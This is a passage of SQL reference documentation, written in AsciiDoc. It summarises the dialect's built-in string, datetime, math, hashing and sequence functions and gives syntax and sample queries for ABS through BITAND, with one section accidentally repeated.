GROUP BY clause but you specify an aggregate function in the select\r\nlist, all rows of the SELECT result table form the one and only group.\r\n\r\nSee the individual entry for the function.\r\n\r\n[[character_string_functions]]\r\n== Character String Functions\r\n\r\nThese functions manipulate character strings and use a character value\r\nexpression as an argument or return a result of a character data type.\r\nCharacter string functions treat each single-byte or multi-byte character\r\nin an input string as one character, regardless of the byte length of\r\nthe character.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<ascii_function,ASCII Function>> | Returns the ASCII code value of the first character of a character value\r\nexpression.\r\n| <<char_function,CHAR Function>> | Returns the specified code value in a character set.\r\n| <<char_length_function,CHAR_LENGTH Function>> | Returns the number of characters in a string. You can also use\r\nCHARACTER_LENGTH.\r\n| <<code_value_function,CODE_VALUE Function>> | Returns an unsigned integer that is the code point of the first\r\ncharacter in a character value expression that can be associated with\r\none of the supported character sets.\r\n| <<concat_function,CONCAT Function>> | Returns the concatenation of two character value expressions as a string\r\nvalue. You can also use the concatenation operator (\\|\\|).\r\n| <<insert_function,INSERT Function>> | Returns a character string where a specified number of characters within\r\nthe character string have been deleted and then a second character\r\nstring has been inserted at a specified start position.\r\n| <<lcase_function,LCASE Function>> | Down-shifts alphanumeric characters. You can also use LOWER.\r\n| <<left_function,LEFT Function>> | Returns the leftmost specified number of characters from a character expression.\r\n| <<locate_function,LOCATE Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use POSITION.\r\n| <<lower_function,LOWER Function>> | Down-shifts alphanumeric characters. You can also use LCASE.\r\n| <<lpad_function,LPAD Function>> | Replaces the leftmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<ltrim_function,LTRIM Function>> | Removes leading spaces from a character string.\r\n| <<octet_length_function,OCTET_LENGTH Function>> | Returns the length of a character string in bytes.\r\n| <<position_function,POSITION Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use LOCATE.\r\n| <<repeat_function,REPEAT Function>> | Returns a character string composed of the evaluation of a character\r\nexpression repeated a specified number of times.\r\n| <<replace_function,REPLACE Function>> | Returns a character string where all occurrences of a specified\r\ncharacter string in the original string are replaced with another\r\ncharacter string.\r\n| <<right_function,RIGHT Function>> | Returns the rightmost specified number of characters from a character\r\nexpression.\r\n| <<rpad_function,RPAD Function>> | Replaces the rightmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<rtrim_function,RTRIM Function>> | Removes trailing spaces from a character string.\r\n| <<space_function,SPACE Function>> | Returns a character string consisting of a specified number of spaces.\r\n| <<substring_function,SUBSTRING\/SUBSTR Function>> | Extracts a substring from a character string.\r\n| <<translate_function,TRANSLATE Function>> | Translates a character string from a source character set to a target\r\ncharacter set.\r\n| <<trim_function,TRIM Function>> | Removes leading or trailing characters from a character string.\r\n| <<ucase_function,UCASE Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UPPER.\r\n| <<upper_function,UPPER Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UCASE.\r\n| <<upshift_function,UPSHIFT Function>> | Up-shift alphanumeric characters. You can also use UPPER or UCASE.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[datetime_functions]]\r\n== Datetime Functions\r\n\r\nThese functions use either a datetime value expression as an argument or\r\nreturn a result of datetime data type:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<add_months_function,ADD_MONTHS Function>> | Adds the integer number of months specified by _intr_expr_ \r\nto _datetime_expr_ and normalizes the result.\r\n| <<converttimestamp_function,CONVERTTIMESTAMP Function>> | Converts a Julian timestamp to a TIMESTAMP value.\r\n| <<current_function,CURRENT Function>> | Returns the current timestamp. You can also use the\r\n<<current_timestamp_function,CURRENT_TIMESTAMP Function>>. \r\n| <<current_date_function,CURRENT_DATE Function>> | Returns the current date.\r\n| <<current_time_function,CURRENT_TIME Function>> | Returns the current time.\r\n| <<current_timestamp_function,CURRENT_TIMESTAMP Function>> | Returns the current timestamp. You can also use the <<current_function,CURRENT Function>>.\r\n| <<date_add_function,DATE_ADD Function>> | Adds the interval specified by _interval_expression_\r\nto _datetime_expr_.\r\n| <<date_part_function_of_an_interval,DATE_PART Function (of an Interval)>> | Extracts the datetime field specified by _text_ from the interval value\r\nspecified by interval and returns the result as an exact numeric value.\r\n| <<date_part_function_of_a_timestamp,DATE_PART Function (of a Timestamp)>> | Extracts the datetime field specified by _text_ from the datetime value\r\nspecified by timestamp and returns the result as an exact numeric value.\r\n| <<date_sub_function,DATE_SUB Function>> | Subtracts the specified _interval_expression_ from\r\n_datetime_expr._\r\n| <<date_trunc_function,DATE_TRUNC Function>> | Returns the date with the time portion of the day truncated.\r\n| <<dateadd_function,DATEADD Function>> | Adds the interval specified by _datepart_ and _num_expr_\r\nto _datetime_expr_.\r\n| <<datediff_function,DATEDIFF Function>> | Returns the integer value for the number of _datepart_ units of time\r\nbetween _startdate_ and _enddate_.\r\n| <<dateformat_function,DATEFORMAT Function>> | Formats a datetime value for display purposes.\r\n| <<day_function,DAY Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAYOFMONTH.\r\n| <<dayname_function,DAYNAME Function>> | Returns the name of the day of the week from a date or timestamp\r\nexpression.\r\n| <<dayofmonth_function,DAYOFMONTH Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAY.\r\n| <<dayofweek_function,DAYOFWEEK Function>> | Returns an integer value in the range 1 through 7 that represents the\r\ncorresponding day of the week.\r\n| <<dayofyear_function,DAYOFYEAR Function>> | Returns an integer value in the range 1 through 366 that represents the\r\ncorresponding day of the year.\r\n| <<extract_function,EXTRACT Function>> | Returns a specified datetime field from a datetime value expression or\r\nan interval value expression.\r\n| <<hour_function,HOUR Function>> | Returns an integer value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n| <<juliantimestamp_function,JULIANTIMESTAMP Function>> | Converts a datetime value to a Julian timestamp.\r\n| <<minute_function,MINUTE Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding minute of the hour.\r\n| <<month_function,MONTH Function>> | Returns an integer value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n| <<monthname_function,MONTHNAME Function>> | Returns a character literal that is the name of the month of the year\r\n(January, February, and so on).\r\n| <<quarter_function,QUARTER Function>> | Returns an integer value in the range 1 through 4 that represents the\r\ncorresponding quarter of the year.\r\n| <<second_function,SECOND Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding second of the minute.\r\n| <<timestampadd_function,TIMESTAMPADD Function>> | Adds the interval of time specified by _interval-ind_ and\r\n_num_expr_ to _datetime_expr_.\r\n| <<timestampdiff_function,TIMESTAMPDIFF Function>> | Returns the integer value for the number of _interval-ind_\r\nunits of time between _startdate_ and _enddate_.\r\n| <<week_function,WEEK Function>> | Returns an integer value in the range 1 through 54 that represents the\r\ncorresponding week of the year.\r\n| <<year_function,YEAR Function>> | Returns an integer value that represents the year.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[mathematical_functions]]\r\n== Mathematical Functions\r\n\r\nUse these mathematical functions within an SQL numeric value expression:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<abs_function,ABS Function>> | Returns the absolute value of a numeric value expression. \r\n| <<acos_function,ACOS Function>> | Returns the arccosine of a numeric value expression as an angle expressed in radians.\r\n| <<asin_function,ASIN Function>> | Returns the arcsine of a numeric value expression as an angle expressed in radians.\r\n| <<atan_function,ATAN Function>> | Returns the arctangent of a numeric value expression as an angle expressed in radians.\r\n| <<atan2_function,ATAN2 Function>> | Returns the arctangent of the x and y coordinates, specified by two numeric value expressions, as an angle expressed in radians.\r\n| <<ceiling_function,CEILING Function>> | Returns the smallest integer greater than or equal to a numeric value expression.\r\n| <<cos_function,COS Function>> | Returns the cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<crc32_function,CRC32 Function>> | Returns CRC32 checksum\r\n| <<cosh_function,COSH Function>> | Returns the hyperbolic cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<degrees_function,DEGREES Function>> | Converts a numeric value expression expressed in radians to the number of degrees.\r\n| <<exp_function,EXP Function>> | Returns the exponential value (to the base e) of a numeric value expression.\r\n| <<floor_function,FLOOR Function>> | Returns the largest integer less than or equal to a numeric value expression.\r\n| <<log_function,LOG Function>> | Returns the natural logarithm of a numeric value expression.\r\n| <<log10_function,LOG10 Function>> | Returns the base 10 logarithm of a numeric value expression.\r\n| <<mod_function,MOD Function>> | Returns the remainder (modulus) of an integer value expression divided by an integer value expression.\r\n| <<nullifzero_function,NULLIFZERO Function>> | Returns the value of the operand unless it is zero, in which case it returns NULL.\r\n| <<pi_function,PI Function>> | Returns the constant value of pi as a floating-point value.\r\n| <<power_function,POWER Function>> | Returns the value of a numeric value expression raised to the power of an integer value expression. You can also use the exponential operator \\*\\*.\r\n| <<radians_function,RADIANS Function>> | Converts a numeric value expression expressed in degrees to the number of radians.\r\n| <<round_function,ROUND Function>> | Returns the value of _numeric_expr_ round to _num_ places to the right of the decimal point.\r\n| <<sign_function,SIGN Function>> | Returns an indicator of the sign of a numeric value expression. If value is less than zero, returns -1 as the indicator. If value is zero,\r\nreturns 0. If value is greater than zero, returns 1.\r\n| <<sin_function,SIN Function>> | Returns the sine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<sinh_function,SINH Function>> | Returns the hyperbolic sine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<sqrt_function,SQRT Function>> | Returns the square root of a numeric value expression.\r\n| <<tan_function,TAN Function>> | Returns the tangent of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<tanh_function,TANH Function>> | Returns the hyperbolic tangent of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<zeroifnull_function,ZEROIFNULL Function>> | Returns the value of the operand unless it is NULL, in which case it returns zero.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[encryption_functions]]\r\n == Encryption Functions\r\n Use these functions within an SQL value expression to do data encryption or hashing:\r\n \r\n [cols=\"25%,75%\"]\r\n |===\r\n | <<md5_function,MD5 Function>> | Returns MD5 checksum\r\n | <<sha_function,SHA Function>> | Returns SHA-1 160-bit checksum\r\n | <<sha2_function,SHA2 Function>> | Returns SHA-2 checksum\r\n |===\r\n\r\n[[sequence_functions]]\r\n== Sequence Functions\r\n\r\nSequence functions operate on ordered rows of the intermediate result\r\ntable of a SELECT statement that includes a SEQUENCE BY clause. Sequence\r\nfunctions are categorized generally as difference, moving, offset, or\r\nrunning.\r\n\r\nSome sequence functions, such as ROWS SINCE, require sequentially\r\nexamining every row in the history buffer until the result is computed.\r\nExamining a large history buffer in this manner for a condition that has\r\nnot been true for many rows could be an expensive operation. In\r\naddition, such operations may not be parallelized because the entire\r\nsorted result set must be available to compute the result of the\r\nsequence function.\r\n\r\n[[difference_sequence_functions]]\r\n=== Difference sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<diff1_function,DIFF1 Function>> | Calculates differences between values of a column expression in the current row and previous rows.\r\n| <<diff2_function,DIFF2 Function>> | Calculates differences between values of the result of DIFF1 of the current row and DIFF1 of previous rows.\r\n|===\r\n\r\n[[moving_sequence_functions]]\r\n=== Moving sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<movingcount_function,MOVINGCOUNT Function>> | Returns the number of non-null values of a column expression in the current window.\r\n| <<movingmax_function,MOVINGMAX Function>> | Returns the maximum of non-null values of a column expression in the current window.\r\n| <<movingmin_function,MOVINGMIN Function>> | Returns the minimum of non-null values of a column expression in the current window.\r\n| <<movingstddev_function,MOVINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression in the current window.\r\n| <<movingsum_function,MOVINGSUM Function>> | Returns the sum of non-null values of a column expression in the current window.\r\n| <<movingvariance_function,MOVINGVARIANCE Function>> | Returns the variance of non-null values of a column expression in the current window.\r\n|===\r\n\r\nOffset sequence function\r\n=== Offset sequence function\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<offset_function,OFFSET Function>> | Retrieves columns from previous rows.\r\n|===\r\n\r\n<<<\r\n[[running_sequence_functions]]\r\n=== Running sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<runningavg_function,RUNNINGAVG Function>> | Returns the average of non-null values of a column expression up to and including the current row.\r\n| <<runningcount_function,RUNNINGCOUNT Function>> | Returns the number of rows up to and including the current row.\r\n| <<runningmax_function,RUNNINGMAX Function>> | Returns the maximum of values of a column expression up to and including the current row.\r\n| <<runningmin_function,RUNNINGMIN Function>> | Returns the minimum of values of a column expression up to and including the current row.\r\n| <<runningrank_function,RUNNINGRANK Function>> | Returns the rank of the given value of an intermediate result table ordered by a SEQUENCE BY clause in a SELECT statement.\r\n| <<runningstddev_function,RUNNINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression up to and including the current row.\r\n| <<runningsum_function,RUNNINGSUM Function>> | Returns the sum of non-null values of a column expression up to and including the current row.\r\n| <<runningvariance_function,RUNNINGVARIANCE Function>> | Returns the variance of non-null values of a column expression up to and including the current row.\r\n|===\r\n\r\n[[other_sequence_functions]]\r\n=== Other sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<lastnotnull_function,LASTNOTNULL Function>> | Returns the last non-null value for the specified column expression. If only null values have been returned, returns null.\r\n| <<rows_since_function,ROWS SINCE Function>> | Returns the number of rows counted since the specified condition was last true.\r\n| <<rows_since_changed_function,ROWS SINCE CHANGED Function>> | Returns the number of rows counted since the specified set of values last changed.\r\n| <<this_function,THIS Function>> | Used in ROWS SINCE to distinguish between the value of the column in the current row and the value of the column in previous rows.\r\n|===\r\n\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>> and the individual entry for each function.\r\n\r\n<<<\r\n[[other_functions_and_expressions]]\r\n== Other Functions and Expressions\r\n\r\nUse these other functions and expressions in an SQL value expression:\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<authname_function,AUTHNAME Function>> | Returns the authorization name associated with the specified authorization ID number.\r\n| <<bitand_function,BITAND Function>> | Performs 'and' operation on corresponding bits of the two operands.\r\n| <<case_expression,CASE (Conditional) Expression>> | A conditional expression. The two forms of the CASE expression are simple and searched.\r\n| <<cast_expression,CAST Expression>> | Converts a value from one data type to another data type that you specify.\r\n| <<coalesce_function,COALESCE Function>> | Returns the value of the first expression in the list that does not have a NULL value or if all \r\nthe expressions have NULL values, the function returns a NULL value.\r\n| <<converttohex_function,CONVERTTOHEX Function>> | Converts the specified value expression to hexadecimal for display purposes.\r\n| <<current_user_function,CURRENT_USER Function>> | Returns the database user name of the current user who invoked the function.\r\n| <<decode_function,DECODE Function>> | Compares _expr_ to each _test_expr_ value one by one in the order provided.\r\n| <<explain_function,EXPLAIN Function>> | Generates a result table describing an access plan for a SELECT, INSERT, DELETE, or UPDATE statement.\r\n| <<isnull_function,ISNULL Function>> | Returns the first argument if it is not null, otherwise it returns the second argument.\r\n| <<is_ipv4_function, IS_IPV4 Function>> | Returns 1 if the argument is a valid IPv4 address specified as a string, 0 otherwise.\r\n| <<is_ipv6_function, IS_IPV6 Function>> | Returns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise.\r\n| <<inet_aton_function, INET_ATON Function>> | Given the dotted-quad representation of an IPv4 network address as a string, returns an integer that represents the numeric value of the address in network byte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n| <<inet_ntoa_function, INET_NTOA Function>> | Given a numeric IPv4 network address in network byte order, returns the dotted-quad string representation of the address as a nonbinary string in the connection character set. INET_NTOA() returns NULL if it does not understand its argument.\r\n| <<nullif_function,NULLIF Function>> | Returns the value of the first operand if the two operands are not equal, otherwise it returns NULL.\r\n| <<nvl_function,NVL Function>> | Returns the value of the first operand unless it is NULL, in which case it returns the value of the second operand.\r\n| <<user_function,USER Function>> | Returns either the database user name of the current user who invoked the function or the database user name \r\nassociated with the specified user ID number.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n<<<\r\n[[abs_function]]\r\n== ABS Function\r\n\r\nThe ABS function returns the absolute value of a numeric value\r\nexpression. ABS is a {project-name} SQL extension.\r\n\r\n```\r\nABS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ABS function. The result is returned as an unsigned\r\nnumeric value if the precision of the argument is less than 10 or as a\r\nLARGEINT if the precision of the argument is greater than or equal to\r\n10. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_abs]]\r\n=== Examples of ABS\r\n\r\n* This function returns the value 8:\r\n+\r\n```\r\nABS (-20 + 12)\r\n```\r\n\r\n<<<\r\n[[acos_function]]\r\n== ACOS Function\r\n\r\nThe ACOS function returns the arccosine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nACOS is a {project-name} SQL extension. \r\n\r\n```\r\nACOS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ACOS function. The range for the value of the argument is \r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value_Expressions>>.\r\n\r\n[[examples_of_acos]]\r\n=== Examples of ACOS\r\n\r\n* The ACOS function returns the value 3.49044274380724416E-001 or\r\napproximately 0.3491 in radians (which is 20 degrees).\r\n+\r\n```\r\nACOS (0.9397)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ACOS is the\r\ninverse of the function COS.\r\n+\r\n```\r\nACOS (COS (0.3491))\r\n```\r\n\r\n<<<\r\n[[add_months_function]]\r\n=== ADD_MONTHS Function\r\n\r\nThe ADD_MONTHS function adds the integer number of months specified by\r\n_int_expr_ to _datetime_expr_ and normalizes the result. ADD_MONTHS is a {project-name} SQL\r\nextension.\r\n\r\n```\r\nADDMONTHS (datetimeexpr, intexpr [, int2 ])\r\n```\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The return value is the same type as the _datetime_expr._ See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `_int_expr_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT or INTEGER that\r\nspecifies the number of months. See <<numeric_value_expressions,\r\nNumeric Value Expressions>>.\r\n\r\n* `_int2_`\r\n+\r\nis an unsigned integer constant. If _int2_ is omitted or is the literal\r\n0, the normalization is the standard normalization. If _int2_ is the\r\nliteral 1, the normalization includes the standard normalization and if\r\nthe starting day (the day part of _datetime_expr_) is the last day of\r\nthe starting month, then the ending day (the day part of the result\r\nvalue) is set to the last valid day of the result month. See\r\n<<standard_normalization,Standard Normalization>>. See\r\n<<numeric_value_expressions,Numeric Value Expressions>> .\r\n\r\n<<<\r\n[[examples_of_add_months]]\r\n=== Examples of ADD_MONTHS\r\n\r\n* This function returns the value DATE '2007-03-31':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the value DATE '2007-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 0)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2008-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the timestamp '2009-02-28 00:00:00':\r\n+\r\n```\r\nADD_MONTHS(timestamp'2008-02-29 00:00:00',12,1)\r\n```\r\n\r\n<<<\r\n[[ascii_function]]\r\n== ASCII Function\r\n\r\nThe ASCII function returns the integer that is the ASCII code of the\r\nfirst character in a character string expression associated with either\r\nthe ISO8891 character set or the UTF8 character set.\r\n\r\nASCII is a {project-name} SQL extension.\r\n\r\n```\r\nASCII (character-expression) \r\n```\r\n\r\n* `_character-expression`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ascii]]\r\n=== Considerations For ASCII\r\n\r\nFor a string expression in the UTF8 character set, if the value of the\r\nfirst byte in the string is greater than 127, {project-name} SQL returns this\r\nerror message:\r\n\r\n```\r\nERROR[8428] The argument to function ASCII is not valid.\r\n```\r\n\r\n[[examples_of_ascii]]\r\n=== Examples of ASCII\r\n\r\n* Select the column JOBDESC and return the ASCII code of the first\r\ncharacter of the job description:\r\n+\r\n```\r\nSELECT jobdesc, ASCII (jobdesc) FROM persnl.job;\r\n\r\nJOBDESC (EXPR)\r\n----------------- --------\r\nMANAGER 77\r\nPRODUCTION SUPV 80\r\nASSEMBLER 65\r\nSALESREP 83\r\n... ...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[asin_function]]\r\n== ASIN Function\r\n\r\nThe ASIN function returns the arcsine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nASIN is a {project-name} SQL extension.\r\n\r\n```\r\nASIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ASIN function. The range for the value of the argument is\r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[considerations_for_ascii]]\r\n=== Considerations for ASCII\r\n\r\nFor a string expression in the UTF8 character set, if the value of the\r\nfirst byte in the string is greater than 127, {project-name} SQL returns this\r\nerror message:\r\n\r\n```\r\nERROR[8428] The argument to function ASCII is not valid.\r\n```\r\n\r\n[[examples_of_ascii]]\r\n=== Examples of ASCII\r\n\r\n* Select the column JOBDESC and return the ASCII code of the first\r\ncharacter of the job description:\r\n+\r\n```\r\nSELECT jobdesc, ASCII (jobdesc) FROM persnl.job;\r\n\r\nJOBDESC (EXPR)\r\n----------------- --------\r\nMANAGER 77\r\nPRODUCTION SUPV 80\r\nASSEMBLER 65\r\nSALESREP 83\r\n... ...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[asin_function]]\r\n== ASIN Function\r\n\r\nThe ASIN function returns the arcsine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nASIN is a {project-name} SQL extension.\r\n\r\n```\r\nASIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ASIN function. The range for the value of the argument\r\nis from -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_asin]]\r\n=== Examples of ASIN\r\n\r\n* This function returns the value 3.49044414403046400e-001 or\r\napproximately 0.3491 in radians (which is 20 degrees):\r\n+\r\n```\r\nASIN(0.3420)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ASIN is the\r\ninverse of the function SIN.\r\n+\r\n```\r\nASIN(SIN(0.3491))\r\n```\r\n\r\n<<<\r\n[[atan_function]]\r\n== ATAN Function\r\n\r\nThe ATAN function returns the arctangent of a numeric value expression\r\nas an angle expressed in radians.\r\n\r\nATAN is a {project-name} SQL extension.\r\n\r\n```\r\nATAN ( numeric-expression )\r\n```\r\n\r\n* `_numeric-expression _`\r\n\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the atan function. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan]]\r\n=== Examples of ATAN\r\n\r\n* This function returns the value 8.72766423249958272E-001 or\r\napproximately 0.8727 in radians (which is 50 degrees):\r\n+\r\n```\r\nATAN (1.192)\r\n```\r\n\r\n* This function returns the value 0.8727. The function ATAN is the\r\ninverse of the function TAN.\r\n+\r\n```\r\nATAN (TAN (0.8727))\r\n```\r\n\r\n<<<\r\n[[atan2_function]]\r\n== ATAN2 Function\r\n\r\nThe ATAN2 function returns the arctangent of the x and y coordinates,\r\nspecified by two numeric value expressions, as an angle expressed in\r\nradians.\r\n\r\nATAN2 is a {project-name} SQL extension.\r\n\r\n```\r\nATAN2 (numeric-expression-x,numeric-expression-y)\r\n```\r\n\r\n* `_numeric-expression-x_, _numeric-expression-y_`\r\n\r\nare SQL numeric value expressions that specify the value for the x and y\r\ncoordinate arguments of the ATAN2 function. See\r\n<<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan2]]\r\n=== Examples of ATAN2\r\n\r\n* This function returns the value 2.66344329881899520E+000, or\r\napproximately 2.6634:\r\n+\r\n```\r\nATAN2 (1.192,-2.3)\r\n```\r\n\r\n<<<\r\n[[authname_function]]\r\n== AUTHNAME Function\r\n\r\nThe AUTHNAME function returns the name of the authorization ID that is\r\nassociated with the specified authorization ID number.\r\n\r\n```\r\nAUTHNAME (auth-id)\r\n```\r\n\r\n* `_auth-id_`\r\n+\r\nis the 32-bit number associated with an authorization ID. See\r\n<<authorization_ids,Authorization IDs>>.\r\n\r\nThe AUTHNAME function is similar to the <<user function,USER Function>>.\r\n\r\n[[considerations_for_authname]]\r\n=== Considerations for AUTHNAME\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_authname]]\r\n=== Examples of AUTHNAME\r\n\r\n* This example shows the authorization name associated with the\r\nauthorization ID number, 33333:\r\n+\r\n```\r\n>>SELECT AUTHNAME (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[avg_function]]\r\n== AVG Function\r\n\r\nAVG is an aggregate function that returns the average of a set of\r\nnumbers.\r\n\r\n```\r\nAVG ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe AVG of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. If you specify DISTINCT, duplicate\r\nvalues are eliminated before the AVG function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value _expression_ that determines the\r\nvalues to average. The _expression_ cannot contain an aggregate function\r\nor a subquery. The DISTINCT clause specifies that the AVG function\r\noperates on distinct values from the one-column table derived from the\r\nevaluation of _expression_.\r\n\r\nSee <<numeric_value_expressions,Numeric Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[considerations_for_avg]]\r\n=== Considerations for AVG\r\n\r\n[[data-type-of-the-result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument.\r\n\r\nThe scale of the result is the same as the scale of the argument. If the\r\nargument has no scale, the result is truncated.\r\n\r\n\r\n[[operands-of-the-expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table but\r\ncannot include an aggregate function. These expressions are valid:\r\n\r\n```\r\nAVG (SALARY)\r\nAVG (SALARY * 1.1)\r\nAVG (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[avg_nulls]]\r\n==== Nulls\r\n\r\nAll nulls are eliminated before the function is applied to the set of\r\nvalues. If the result table is empty, AVG returns NULL.\r\n\r\n[[examples_of_avg]]\r\n==== Examples of AVG\r\n\r\n* Return the average value of the SALARY column:\r\n+\r\n```\r\nSELECT AVG (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n---------------------\r\n 49441.52\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average value of the set of unique SALARY values:\r\n+\r\n```\r\nSELECT AVG(DISTINCT salary) AS Avg_Distinct_Salary FROM persnl.employee;\r\n\r\nAVG_DISTINCT_SALARY\r\n---------------------\r\n 53609.89\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average salary by department:\r\n+\r\n```\r\nSELECT deptnum, AVG (salary) AS \"AVERAGE SALARY\"\r\nFROM persnl.employee\r\nWHERE deptnum < 3000 GROUP BY deptnum;\r\n\r\nDept\/Num \"AVERAGE SALARY\"\r\n-------- ---------------------\r\n 1000 52000.17\r\n 2000 50000.10\r\n 1500 41250.00\r\n 2500 37000.00\r\n\r\n--- 4 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[bitand_function]]\r\n== BITAND Function\r\n\r\nThe BITAND function performs an AND operation on corresponding bits of\r\nthe two operands. If both bits are 1, the result bit is 1. Otherwise the\r\nresult bit is 0.\r\n\r\n```\r\nBITAND (expression, expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nThe result data type is a binary number. Depending on the precision of\r\nthe operands, the data type of the result can either be an INT (32-bit\r\ninteger) or a LARGEINT (64-bit integer).\r\n+\r\nIf the max precision of either operand is greater than 9, LARGEINT is\r\nchosen (numbers with precision greater than 9 are represented by\r\nLARGEINT). Otherwise, INT is chosen.\r\n+\r\nIf both operands are unsigned, the result is unsigned. Otherwise, the\r\nresult is signed. Both operands are converted to the result data type\r\nbefore performing the bit operation.\r\n\r\n[[considerations_for_bitand]]\r\n=== Considerations for BITAND\r\n\r\nBITAND can be used anywhere in an SQL query where an expression could be\r\nused. This includes SELECT lists, WHERE predicates, VALUES clauses, SET\r\nstatement, and so on.\r\n\r\nThis function returns a numeric data type and can be used in arithmetic\r\nexpressions.\r\n\r\nNumeric operands can be positive or negative numbers. All numeric data\r\ntypes are allowed with the exceptions listed in the\r\n<<restrictions_for_bitand,Restrictions for BITAND>> section.\r\n\r\n[[restrictions_for_bitand]]\r\n==== Restrictions for BITAND\r\n\r\nThe following are BITAND restrictions:\r\n\r\n* Must have two operands\r\n* Operands must be binary or decimal exact numerics\r\n* Operands must have scale of zero\r\n* Operands cannot be floating point numbers\r\n* Operands cannot be an extended precision numeric (the maximum precision of an extended numeric data type is 128)\r\n\r\n\r\n[[examples_of_bitand]]\r\n=== Examples of 